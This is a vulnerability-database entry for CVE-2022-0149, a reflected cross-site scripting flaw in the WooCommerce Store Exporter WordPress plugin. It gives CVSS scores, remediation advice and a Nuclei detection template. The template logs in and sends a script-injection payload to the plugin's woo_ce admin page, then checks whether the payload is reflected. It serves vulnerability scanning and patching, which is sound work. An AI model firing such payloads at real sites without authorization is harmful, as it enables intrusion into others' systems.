Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0149
HistoryFeb 19, 2022 - 11:21 a.m.

WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting

2022-02-1911:21:38
ProjectDiscovery
github.com
8
cve-2022-0149
cross-site scripting
woocommerce
wordpress
vulnerability
visser
cvss
wpsec
authenticated

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

43.5%

The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.

id: CVE-2022-0149

info:
  name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0149
    - https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0149
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.41295
    cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: visser
    product: store_exporter_for_woocommerce
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210081ed1148acdd44ce4bbb4a3af21ffeda77b9194dc5b2a29d131bcb3812cb496a0220634c9d051f8eca2b28396a98f86e111ea610b2bd2252ef78a64389c7641827b4:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

43.5%